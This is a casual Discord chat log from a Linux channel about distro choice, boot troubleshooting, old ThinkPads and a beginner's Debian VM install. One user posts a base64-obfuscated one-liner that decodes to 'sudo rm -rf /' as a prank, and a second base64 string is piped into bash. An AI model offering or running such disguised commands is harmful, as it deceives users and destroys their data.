Does this need Etcher for a USB?
Assuming Etcher is a tool for creating bootable USB devices, look on that page for "Bootable USB."
oh ok
so.. ubuntu arch or linux-from-scratch?
Yes
you listed them for yourself from easiest to hardest lol
arch is about as advanced you can get without going full neckbeard mode, the next tier up would be gentoo
what went wrong?
i dont even know
i think its because i accidentally installed 2
i need a way to clear this drive
When I boot
It just goes to this
It asks me for my data encryption password
And let's me select my account
And then just this
I need to delete everything on this hard drive
This is first
2nd
Then when I enter my password it does this
And just stays
o
Have you tried refreshing your desktop?
I can't it won't let me off of it
Like if I want to power off I have to take the whole battery out or let it die
Like to get started? Or install?
I prefer Mint over Ubuntu
like to get started
Ok, do you have it downloaded? Copied the USB installer?
Linux Mint is an elegant, easy to use, up to date and comfortable GNU/Linux desktop distribution.
Looks a bit like Windows, so easy to pick up
Yeah, free and open source
I do cinnamon
ok
How to start a war 101: What is the best distribution?

Nobody likes Hannah Montana Linux anymore, smh.
Rebecca Black linux was better
Hi, I recently put a new ssd in my notebook, so I needed to reinstall windows and Ubuntu in a dual boot. The problem is, I had some troubleshooting with RST, I tried some solutions and now I'm able to install Ubuntu and windows, but, the problem was: when I just has finished Ubuntu installation and reboot nothing was displayed, just an blink under_line...any help?
An new message was displayed;
nvme 0000:04:00.0: AER PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
Try the command "startx", that should load the desktop where it will be easier to troubleshoot the boot problem looking at logs
from that description i dont think theyre booted into any os
Yeah but the prompt should still allow you to type commands, and errors to those commands are good for troubleshooting
If i understood, I need cntrl + alt + f2, login and try the command "starx"
"Startx"*
Yes if it allows you to run the command at all that would do it
Any error message will be helpful in diagnosis
It loaded? Great, now we can look at logs and see where it got stuck
Sorry, but whats the path of logs?
journalctl -b
Ok
If it's too long DM me
Ok
Ubuntu is more likely if you want something good and ready to use
To people that are changing windows to Linux it's the best choice....in my opinion...
Mint has a Windows-like interface so it's easier for newbies to pick up. The app drawer can get a bit... messy... in Ubuntu.
dont know until you try
Next PC I build will probs be on a Debian distro
Great tutorial on how to run linux/windows etc in a vm https://www.youtube.com/watch?v=wX75Z-4MEoM
What is a Virtual Machine? Magic...that's what it is!! In this video, NetworkChuck explains what a Virtual Machine is, when you might need one, and how to setup a Kali Linux and Ubuntu VM on Windows 10 with Virtual Box.
Virtual Machine Setup
-Download Virtual Box: http://bit.ly/368FS7Z
-Down...
Linux is no more complex to install than a custom Windows install, and it works out of the box. The only hard part is finding an interface you like.
Not just an interface, but a whole distro
Plus Linux version (arch, Debian, Ubuntu, etc)
Ubuntu is just Debian with extra steps lol
Quick Question y'all, so I am interested in the Linux operating system, but I am a beginner with no command line experience, I was wondering if you guys recommend any videos to help me get started.
Thank you.
@brave isle tbh i recommend installing arch linux in a vm
thats a good command line learning experience
If upon seeing Arch you immediately think "oh frick no" try Mint.
But yeah Arch is good for learning command line if you really want to get into it.
Personally Arch feels easy after you've installed 20+ times. If you want to become a true neck beard Gentoo is the way to go. If you want a stable system but want to use cli you could either get an RPI/SBC and tinker with ssh on it. Or you could install a window manager and learn to customize it to your liking. The last 2 I'd recommend over Arch or Gentoo because you're actually learning how to use the system. Though if you want to learn how it works, Gentoo is probably a better option than Arch.
for a first install i wouldnt tell someone to compile gentoo lmfao
Never said I recommended it 乁( ͡° ͜ʖ ͡°)ㄏ, only if they wanted to learn how the system actually works. Personally starting with a base system and learning how to use it properly, then stepping up to learning simple tui commands/scripts to automate simple things is preferred if you only want to learn how to use it.
eval $(echo c3VkbyBybSAtcmYgLyAtLW5vLXByZXNlcnZlLXJvb3Q= | base64 --decode) epic linux command!!!!111!!11!!1!!1!!!!!
Nice command lili
I wonder if someone actually ran that command on their fresh installed system
What does it do
Ok virtual machine time
Decodes to "sudo rm -rf / --no-preserve-root"
Rude
LOL
i do that on android x86 termux lol
You'd have to root the android for the command to even run though, sudo isn't included by default
ssssssh

i got someone with it
somewhere else
lol
You still have to know what rm does to know what that command does, and most people that know about it know better than to run a random code someone on the internet said lol
What’s it do is that like deleting system32?
That would be (redacted), "rm / -rf" literally means (redacted)
Oh lol
you did lili?
has anyone put kali on a raspberry pi 4 here?
yes its super easy lmfao @fierce kettle
dude i need help
idk what the heck im doing wrong
lemme send a photo right after i do this last burn
are you one of those "hackers"
well if you wanna have fun being a skid
id suggest reading the docs
Official documentation of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.
😐
well theres the docs
sucks
yeah thanks
np
found the issue lili, it was a display issue lol
oh nice!
so i am thinking of switching to arch linux and running virtual machines for other operating systems, how hard would that be to set up?
Not too bad. A bit of a learning curve, but once you get the basics down you're good to do almost anything.
alright
Maybe try running Arch in a VM until you get the hang of it, just in case something goes wrong
thats a good idea thank you
run arch in a vm and use qemu to run everything else
shouldnt be too hard if you follow some tutorials
use ONLY the official arch wiki for install help though
because its what every super power user has told me
and arch wiki has good best practices
The fact is you dont need anything more then the arch wiki to install it
But that doesnt mean to ONLY use the official arch wiki for install help
id say you should take wiki as gospel and use everything else as a maybe
Intel Celeron 400MHz, 256mb DDR2, 3dfx Voodoo3 GPU, Proview 17" CRT, ARCH ™️ with dwm, of course. No pulse audio.
Had to sell my 1997 Toyota Corolla for the DDR2, worth it though
for me i followed wiki but when things got confusing (because i was a first time linux user) i compared with other website, i got hung up around making the file systems
DistroTube's newer video is fine, but he forgets to edit a config file. Wiki should be perfectly fine though, but no, they don't explain everything in the install guide.
@agile jewel ryzen 7 4800h, 16gb, rtx 2060. Speed.
guys if i installed linux can i play games that dont run on dx10 ?
arch?
Yep thus the reply
Linux the choice???
More game developers are making linux binaries but Windows still has the highest compatibility
Just run a VM
Won’t work for games using Battleye but will work for hopefully every other game
I'm having trouble deciding: I have windows installed on my PC right now and it's great. However, I'd really like to switch to Arch but I don't have enough space so I was contemplating wiping the windows drive and switching completely to Linux but I have so many things that only work on windows.
I've heard good things about VMs but I don't want to run windows or linux off a VM.
I have occasionally run Linux from a USB drive. If you have USB3, it's definitely usable.
You can use Linux in a VM until you get used to it, then do a full install later.
Linux is also perfectly happy being on only 8 GB of disk storage, it hardly knows what to do with 16 GB
^^ lol
echo 'Y293c2F5ICJObyBncmVhdCBpZGVhIGluIGl0cyBiZWdpbm5pbmcgY2FuIGV2ZXIgYmUgd2l0aGluIHRoZSBsYXcuIEhvdyBjYW4gaXQgYmUgd2l0aGluIHRoZSBsYXc/IFRoZSBsYXcgaXMgc3RhdGlvbmFyeS4gVGhlIGxhdyBpcyBmaXhlZC4gVGhlIGxhdyBpcyBhIGNoYXJpb3Qgd2hlZWwgd2hpY2ggYmluZHMgdXMgYWxsIHJlZ2FyZGxlc3Mgb2YgY29uZGl0aW9ucyBvciBwbGFjZSBvciB0aW1lLiIK' | base64 -d | bash
ebic linux command
does that translate to sudo rm -rf --no preserve root
perhaps
lili up to her usual tricks 🙄
uwu
lili no being mean

yes
Cow goes moo 😉
my mental health would get even worse
youre already at 15 so keep it up
nah id probs just die
I recently revived an old TinkPad x240 and put Pop OS on it. It runs pretty great (for school) but I have a couple issues with it.
The main issue is that about 33% of the time when I close the lid and open it again, the laptop dies completely.
Either it's stuck in a loop of both the keyboard backlight and power light blinking on for ~1s and then back off, or it appears off and when I press the power button it appears to power on, but then gives up after a few secs (nothing on the LCD in both cases).
When it's in the first state of looping, the only way to get out of it is to take off the external battery and temporarily disconnect the internal battery by pushing a paperclip into the "emergency reset hole".

Maybe I should do a new gentoo build now that I have my new rig. hmm
glorious gentoo
What cheap laptop do you think is best for running Linux? Not in the market or anything, just curious as to y'all's opinions.
Assuming the distro is Ubuntu, because it's the most common. Lmao
@wanton snow @humble kindle
since i know u love thinkpads so much lol
a couple of thinkpad t60s
these things come from such a different time
instead of a webcam or a backlit keyboard, theres a light at the top of the screen you can turn on
designed for windows xp... lol
owo
thinklight baby

just give it a month to compile gentoo and youll be ascended neckbeard @night charm
still trying to pick the lock on the dock
i dont feel any pins so idk how tf im supposed to do this 😩
i should install windows 10 on it
ok i really want to put linux on it and use it at school
that would be hilarious
also with an ssd
:)
god knows what processor is in it
awwww it thinks its 1988
3gbs ram, core two duo t2300
its surprisingly quiet
aside from the loud beep when it realizes the battery is dead
ya, honestly maybe a $30 ebay battery + $20 ssd and you're set
I would totally rock that in high school
Or college
oh my god it got my fingerprint first try
well i was joking about it
but as it is
this has 1 more gb ram than my school issued chromebook LOL
it has office 2007 on it :o
Any luck picking the lock?
nah
also i finally understand why middle click is that weird mode of scrolling!
when you middle click and use the little nub mouse it all makes sense
ok this laptop is surprisingly fast
Is that windows 7?
Huh
Pretty interesting to see old hardware running relatively new software, even if it’s just discord
I like the modern thinkpad keyboards, but I hear a lot of enthusiasts praise the vintage stuff
1024x768
oof
i can see every pixel
and all of the "i"s look like they have accents on them
i love this
this is so much better than any laptop today
i cannot explain how satisfying it is when it works
Wow, it actually works
thats what i was thinking lol
the vintage keebs are pog
turn on cleartype
you gotta go kinda slow, but its better than typing in some crazy long password that whoever the domain manager person guy is put in place
Haha modern thinkpads have similar fingerprint sensors, works well
where do i turn on cleartype
I've definitely recommended oldish thinkpads like librebooted x230's to you a few times
idk i like the T60 so far lol
windows key - clear type should bring it up in win 10
if only the fan was a bit quieter
t550 pretty pog actually
Could probably do with a dusting
im sure that thinkpad would appreciate a clean out and some new paste
lili have you seen wolfgangs channel https://www.youtube.com/channel/UCsnGwSIHyoYN0kiINAGUKxg
Hi! My name is Wolfgang and I make videos about tech, Linux and computers.
The most reliable way to contact me is Twitter DMs – @notthebeeee
You can also write me an e-mail at the address below, I read all of the messages, but sometimes I'm too lazy to reply, please don't take it personally!
i turned on clear type, and it works wonders for system text, but it has no effect in discord
I know I've shared this multiple times but I think it's hilarious https://www.youtube.com/watch?v=349acxMIpTI
it's the solarized meme thing
He does a lot of thinkpad content
Libreboot etc
Surely some linux nerds figured out how to get it working in linux ?
ubuntu :awkward:
Wolfgang actually has a decent following
We all did ime
is it a fresh install
Win 10 was rocky on launch
7 is rly bad but like
Even the hwbot guys don't strip stock win 7 much because it's so light
at least it runs better than 10 on third world class hardware
i have no idea whats on this laptop

this laptop has a vertical usb port
lapops these days are half the height of a usb port total

is it our wolfgang tho
like the one in here
Sounds like him
You didn't know he was a linux nerd?
didnt know he was a youtuber
is he?
whos a linux nerd youtuber
lol no
Also doesn't sound like him imo
statik sounds like the youtuber "boffy" imo
does anybody have windows 10 that i can connect to over RDP right now i want to take a picture of this laptop with it looking like its running win10
i would use my own pc
if i could
lmfao
:sadge:

:)
nah keebs are opinion
some people like old ones some like new ones
i like telling people off for being completely wrong tho
You're wrong if you don't think the k120 is the best keyboard ever made
sorry i was brushing my teeth
and yes
sassy read my mind
fn and ctrl keys should swap places
bottom left should always be ctrl
that too, but imo caps lock and ctrl should swap
thats to encourage vendor lock
wahjksalhkhf what
no one uses caps lock, why is it is such a convenient position
get ppl used to your layout
then no one wants to swap
its the best PTT key
PTT? idk what that is i just hold shift smh
I use a thumb mouse button, but want to switch, those are to useful for forward/back most games
lili, as for the rest of the keyboard, it feels good, i like modern laptop keyboards better, but its held up great over the years, doesnt feel mushy. Finger gets caught on the mouse nub from time to time
currently typing on it
i try to use thumb buttons for non critical functions, like if i accidentally bump it and i go prone or some crap
kEEb
yes cause im playing a game rn
i think this laptop barely has any key rollover
it beeps if i spam it
the touchpad is super accurate and responsive somehow
like
extremely good
i feel like i could play osu on it

i type better on this than my actual gaming keyboard

it dropped to 0 wpm because it lagged pretty hard but i kept typing which explains the spike
idk what it is about old laptop keyboards that makes it easy to type fast
also damn 110 lol
just hit 112 without lagspike
ok thats enough monkeytype for now
chrome makes this laptop 💀
I expect as much
Use Opera GX
yeah no
i should not be able to type this fast on this laptop
the keys are like
old
this laptop has dedicated media keys :o
I hate typing on gaming keyboards tbh
and the thinkpad volume is separate from windows volume
this really makes me want a surface laptop go
to me, that somewhat feels like a sort of evolution of this
in regards to the fingerprint sensor, boxy screen, thin bezels, etc.
but modern
Is that thing comparable to a surface laptop in your opinion?
Also, wow, 8gb RAM
That’s rare on DOS, no?
dying light
I have that on Game Pass
What
Did I say something dumb?
ur experiencing the glory of thinkpad
oh god please dont ping me idk what kind of notification thing this has but it glitches horribly lol
i basically get flashbanged
Oh my
imo thinkpad keyboard >>>>>> everything else
oh sorry @night charm ill be sure not to ping

im going to tab out, ping me again and ill record with my phone
@abstract birch
@night charm
and yeah 1111 isnt gonna say anything
he knows im right
im talking abt laptops
He is going to preach keychron
Also you didn’t say it was the best laptop kb, just the best kb
KEK
Your pfp at the end lmao
Rip core 2 duo
Guess you'll just have to use discord through surf without a gui
see how high you can OC it
that sounds like a bad idea
i really want to bring this to school
and use the fingerprint reader
What’s what we do here
it is not what i do
the school issued chromebooks dont
Ah
rich
2fa baby
what laptop is it
pixelbook
is it running chromeos
it can do a lot
oh wait
honestly most of my work is browser based
i forgot it can run linux stuff now
it connects to my vpn just fine
my school blocks all that stuff out, so im used to restricted chromeos
and it can handle 2k+ tabs
it better be able to handle over 2k tabs
btw did you know you can group chrome tabs now
just right click and press "add to group"
overpowered
back when the pixelbook came out chromeos was a lot worse tho right
i suppose... but ipad pro is cheaper lol
ehhh
i guess it is a lot less like a laptop
does pixelbook have ability to detach screen from keyboard tho
no
also im not sure how they sound, but the speakers on my dads ipad pro are extremely good lol
*not sure how the pixelbook speakers sound
oh well then problem solved lol
99% of the time
You might have thought I was off to bed, but no, I am here once again to preach the goodness of Keychron and wireless keeb for laptop
ive been wanting a portable device for awhile... and if i were to get one it would be between an ipad and a surface laptop go for me
leaning towards surface laptop go because cheaper and more capable
and I'll be gone again because I bad at linux
i cant wait for the surface to last like 2 years
i only started all this convo in the linux channel because its calm lol
general chat too busy for this kind of conversation
and it sort of relates to linux because i mentioned possibly putting linux on the thinkpad lol
(thats an excuse)
general chat full of brainlets saying "haha why even own laptop"
i really do not enjoy general chat often... lol
Hence why you mostly hang out here and in the VR channel
i check here and my channel
and thats basically it
the less gray names i see the better
And then she DMs me
Also you were having a fine convo with a grey name 22 hours ago
also lili, why do you think the surface would only last 2 years?
theres exceptions
because all my surfaces lasted 2 years
and every surface a client has ever deployed has lasted 2 years
i can maybe see why a surface pro would only last that long, its basically a windows tablet... but the surface laptop go is a more traditional laptop with a metal body besides the bottom
what kinds of issues did they have?
mostly heat and durability
Haha laptops bad
forgive me cause i honestly dont know anything abt the surface laptop go
but am guessing
u cant repaste
and that was the main issue
with any thin and light
cause after 2 years it gets rough
yeah
youll get oofed by throttling
like idk id rather thinkpad and just ride it out for 10 years
cause now youve seen with your own eyes
10 year old thinkpad actually usable

fr tho like u can use thinkpads forever
i bet your thinkpad can get panel swapped and new keeb and new everything
if you look
parts is insane
is modern thinkpad the same way tho
great for people who actually take care of their stuff
yes
can panel swap easily
same with trackpad and everything else
its just not the same level of thin and light 😩
u can get a carbon
as dumb as it sounds i somehwat prioritize looks over longevity when it comes to this
i think it will last more than 2 years
if i only use it for things like discord/web browsing/light photoshop at the max, it will be fine
it would have 8gb ram and 128gb storage anyways, not like i can do much beyond that
We need a laptop channel
non upgradable?
no we do not :)
You mean a thinkpad channel?
brb gonna win+l to use fingerprint reader for fun
IT WORKED AGAIN
istg its like an instant serotonin boost
also because windows 7 plays the login sound effect
wait serotonin is the happy chemical right
i forget
whatever it is its just an instant mood boost
I always hated those sound effects
i love them
It would be middle of night i turn on computer and you just hear loud uncontrollable boot up sound
i love it.
ok i need to stop locking and unlocking this laptop lol
its so addicting
ive had this thinkpad for as long as i can remember and the fingerprint sensor never worked with this success rate
Yikes
i think i finally found the right method for scanning
keep it flat, go a certain rate, etc.
and make sure finger not sweaty
too addicting
Wow
ok im going to sleep now.
Same in 2 minutes
No no, make sure finger is very very sweaty
I haven’t heard that noise in so long lmao
thinking of messing around with this
might as well share it
When you use ubuntu to avoid data going to zoom.
how tf do I point a debian vm at an iso in vbox?
Dread
@brave isle
do you know how?
like
idk
lili said I need to point the machine at a debian ISO
which I downloaded
yeah but where
When you launch the machine
then it says "New"
and you allocate ram , and cores
then it will say "Create a Virtual drive"
yeah i did that
i have the machine saved in vbox
lili said I could point it somewhere from there
Yeah in the settings, can you send a SS?
settings
Either system or storage iirc.
Shared folders is through your main OS
and pointing it into the VM
For example, malware testing.
I already made that
Oh
i did vdi
I mean, it might be easier making a whole new one with same settings
dang ok
Its been ages since I used virtual box lol.
My main issue with it was GPU passthrough
Wait
could you and i go in the vc
sure
lol.
wait what
now what
lili doesnt want me to have a GUI
;-;
OH NO SHES HERE
stfu lili
stfu lili
x2
Do I need this part?

wait
i pressed desktop environment on accident didnt I

GUI is for the weak

both of yall need to shush
SHUSH
I just press the power button to use my computer

^^^^
sara is weak she installed gui

Only power button
whatever
ill use the terminal version next time im on good computer
Smh
I just unplug the psu and wire it to the power lines directly
^^^
Weak headers and jumpers
SMH, great way to fry your computer.
I may need to go in a minute
Especially when rain happens
I just telekinetically power my computer with my brain
literally useless to run linux with a gui anyways
AHHHHHHHHHH
Weak power lines
u wont learn anything
Why do you have razer stuff installed

AHHHHHHHHHHHHHH
shes a razer kiddie

When Razer cortex can boot before windows can load in loading screen

I just destroy the universe to create a subuniverse so I can force all the universes to power my computer
Weak universe

Just use a microverse battery
windows dark mode = good
black cursors are actual garbage
i dont always use a mouse, but when i do, its with the kde breeze cursor
Damn why didn't I think of that

Thanks for the suggestion
do I need GRUB boot loader or nah
SMH imagine not plugging in 12v 24pin ATX into your headers.
No the microverse battery not ubuntu
kek
.
if u want to be able to start the vm more than once
GRUB or nothing
Reason: Duplicated text
But real power users use BURG
i use clover and grub
"non magnetic disk drives", so a DVD?
AHCI was normally supposed to be used on magnetic drives.
Trial and error
fine
youll learn more that way
what is sara doing

Attempting to install debian
virtual box
"Attempting".
"Here walk across these coals"
"How?"
"Figure it out"

arch wiki probably has a debian install guide
imagine getting spoonfed commands and then thinking you know anything
^^^^^^^^
arch wiki has guides for so much stuff lol
Epic
arch wiki actually taught me how to make fried chicken
Now I can finally play Minecraft
Do you think Chernobyl was like? Google "Tutorial how to clean up nuclear waste"

"How to clean up nuclear waste 101"

wikihow

Ah yes, "Wikihow: how to clean up nuclear waste from fission"
Step 2: Figure it out
SMH just do Ctrl Alt t
then type tasksel
Assuming its like most linux distros
terminal...
Ctrl Alt T works

Fedora Server is my love
Red Hat on my server
now what should I do
since ur root i bet u can just enter reboot command
i can see why you enjoy other people's pain
cause i am also
kek
so just type reboot?
jk fedora nice
but u can install cockpit on literally any distro
lmao i know
nope
I dont use Fedora server currently but I have in the past

reboot dont work
sudo systemctl start reboot.target
the entire goal was to teach her basic commands

Well I derive enjoyment from other people's pain

type apt?

I hope sara doesn't ask "What is a good psu"
no i bet ur hand is sweaty
type "apt-get moo"
What is the hardest distro to install?
gentoo
We should give sara it
i daily gentoo
My hand clean
shes getting warmer
ok hint cause this is HURTING
apt command
not just the command lul
for example to update your packages
itd be apt update
Why do I feel like sara will attempt a punett square but with linux distros in it
you should know how to install
Seriously, apt-get moo

APT-GET LUL
sorry i was talking to someone
I dont want to run half these commands because irdk if yall are joking or not
I know, i see it
i was memeing with install tho
I swear on my reputation that "apt-get moo" is not dangerous

therea a moo
Read this

Yeah, it embedded basic system features into your vbox
Linux easter eggs lol
oh my god sara this is painful
Imagine not knowing it embeds basic system features.
